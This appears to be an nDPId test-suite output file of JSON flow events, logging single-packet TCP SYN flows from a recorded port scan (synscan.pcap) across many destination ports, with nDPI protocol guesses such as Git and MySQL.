-00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Git","breed":"Safe","category":"Collaborative"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1233,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1234,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1233,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1234,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061155,"flow_last_seen":1278275061155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1236,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061155,"flow_last_seen":1278275061155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1236,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061111,"flow_last_seen":1278275061111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061111,"flow_last_seen":1278275061111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061213,"flow_last_seen":1278275061213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061213,"flow_last_seen":1278275061213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1244,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1244,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1247,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1248,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1248,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1247,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1248,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1248,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 